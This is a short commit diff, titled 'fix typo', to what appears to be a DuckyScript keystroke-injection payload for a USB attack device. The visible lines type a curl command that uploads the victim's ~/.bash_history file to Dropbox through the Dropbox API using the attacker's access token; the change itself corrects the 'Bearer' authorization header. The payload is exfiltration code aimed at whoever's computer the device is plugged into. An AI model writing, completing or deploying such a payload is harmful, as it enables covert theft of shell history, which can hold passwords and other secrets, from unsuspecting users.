fix typo
parent
e7cffd1cd8
commit
b027af3ff6
|
@ -17,7 +17,7 @@ DELAY 500
|
||||||
STRING curl -X POST https://content.dropboxapi.com/2/files/upload
|
STRING curl -X POST https://content.dropboxapi.com/2/files/upload
|
||||||
SPACE
|
SPACE
|
||||||
REM replace the [DROPBOX_ACCESS_TOKEN] placeholder with your actual Dropbox access token
|
REM replace the [DROPBOX_ACCESS_TOKEN] placeholder with your actual Dropbox access token
|
||||||
STRING --header "Authorization: Bea[DROPBOX_ACCESS_TOKEN]"
|
STRING --header "Authorization: Bearer [DROPBOX_ACCESS_TOKEN]"
|
||||||
SPACE
|
SPACE
|
||||||
STRING --header "Dropbox-API-Arg: {\"path\": \"/home/$USER/.bash_history\"}"
|
STRING --header "Dropbox-API-Arg: {\"path\": \"/home/$USER/.bash_history\"}"
|
||||||
SPACE
|
SPACE
|
||||||
|
|
Loading…
Reference in New Issue